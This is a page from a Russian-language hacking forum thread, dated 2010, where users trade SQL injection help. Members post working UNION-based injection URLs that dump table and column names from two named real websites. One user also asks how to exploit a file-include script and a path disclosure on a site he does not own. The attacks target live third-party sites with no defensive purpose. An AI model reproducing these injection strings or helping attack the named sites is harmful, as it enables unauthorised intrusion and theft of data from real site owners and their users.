HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14301  
Старый 10.07.2010, 18:05
happygirl
Guest
Сообщений: n/a
Провел на форуме:
2597

Репутация: 0
По умолчанию

Пожалуйста, помогите мне, как добраться таблиц и столбцов с этого сайта. Я не могу использовать синтаксис union_

http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27

Цитата:
Сообщение от None  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' ORDER BY emissions.sTitre' at line 1
 
Ответить с цитированием

  #14302  
Старый 10.07.2010, 18:08
haito
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441

Репутация: 0
По умолчанию

Цитата:
Сообщение от попугай  
попугай said:
Нажми Ctrl+U на клавиатуре и посмотри.
Press Ctrl+U on your keyboard and see
Благодарю вас, это работа
 
Ответить с цитированием

  #14303  
Старый 10.07.2010, 18:44
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Цитата:
Сообщение от happygirl  
happygirl said:
Пожалуйста, помогите мне, как добраться таблиц и столбцов с этого сайта. Я не могу использовать синтаксис union_
http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27
0_о не понял в чем проблема?

http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27+union+sele ct+1,2,3,4,5,concat_ws%280x3a,table_schema,table_n ame,column_name%29+from+information_schema.columns--+
 
Ответить с цитированием

  #14304  
Старый 10.07.2010, 20:26
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию

Привет.

Есть сайтик. На шаред хостинге стоит, в другой стране. Работает под управлением самописного движка (сорцев нет).

На сайтике есть один скриптик. Его вызов таков:

http://site/lol.php?p=name

этот скрипт инклюдит файл /pages/name.php (".php" подставляется автоматом).

Еще знаю путь к PHP (мне так кажется, выглядит как /usr/local/nf/php5/lib/php).

Еще кое что есть.

Скриптик, который как-то хитро выполняет запрос. Ему подставляешь число, а он делает выборку из базы (SQL) и выдает ссылку на файл. Если подставить ему, например, -1 в качестве номера, начинает срать кирпичами. Ничего особого там нет, если не считать полного раскрытия путей.

Что можно сделать, дорогие эксперты?

Спасибо.
 
Ответить с цитированием

  #14305  
Старый 10.07.2010, 20:52
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

По той информации, что ты предоставил, судить о наличии уязвимостей не возможно.

Либо задавай вопрос конкретнее, либо читай статьи.
 
Ответить с цитированием

  #14306  
Старый 11.07.2010, 05:40
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596

Репутация: 88
По умолчанию

Помогите плиз сформировать строку иньекции, а то с выводом даже ошибки, а что-то ничего не прокатывает (

http://www.noracom24.eu/image.php?w=200&h=120&id='
 
Ответить с цитированием

  #14307  
Старый 11.07.2010, 06:08
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Цитата:
Сообщение от AKYLA  
AKYLA said:
Помогите плиз сформировать строку иньекции, а то с выводом даже ошибки, а что-то ничего не прокатывает (
http://www.noracom24.eu/image.php?w=200&h=120&id='
Код:
Code:
http://www.noracom24.eu/image.php?w=200&h=120&id=1+and+1=2+union+select+group_concat%28table_name%29+from+information_schema.tables+where+table_schema=database%28%29+--+
там в картинке выводится
 
Ответить с цитированием

  #14308  
Старый 11.07.2010, 06:24
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596

Репутация: 88
По умолчанию

Seravin

Сенкс, даже не подумал что так может быть...мда тут по ходу никак не поработаешь автоматизировано с ней, с таким выводом (
 
Ответить с цитированием

  #14309  
Старый 11.07.2010, 14:33
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

не знаю как вы но я никогда не использовал программы чтобы найти или автоматически раскрутить скул,

от этого одни минусы

1. вы не осваиваете sql инъекцию хорошо

2. вы доверяете программу которая может ошибиться

3. и этот взлом даже не можете считать вашим (это чистое мнение)

однажды я раскрутил скул до паролей, походу было два запроса и поэтому немного потрудилась над колонками..

потом скул даль программу havij которая считается крутой тулзой,и программа не смог раскрутить скул

sql инъекции бывают такими разными что программно раскрутить все это не реально(я так думаю)

вообщем дело ваше, простите за оффтоп(если это оффтоп)
 
Ответить с цитированием

  #14310  
Старый 11.07.2010, 14:48
Boa
Новичок
Регистрация: 30.05.2010
Сообщений: 25
Провел на форуме:
67694

Репутация: 5
По умолчанию

/showpost.php?p=2243635&postcount=14262

Актуально.

Konqi, иногда надоедают однотипные действия) Хотя самостоятельно лучше, да.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ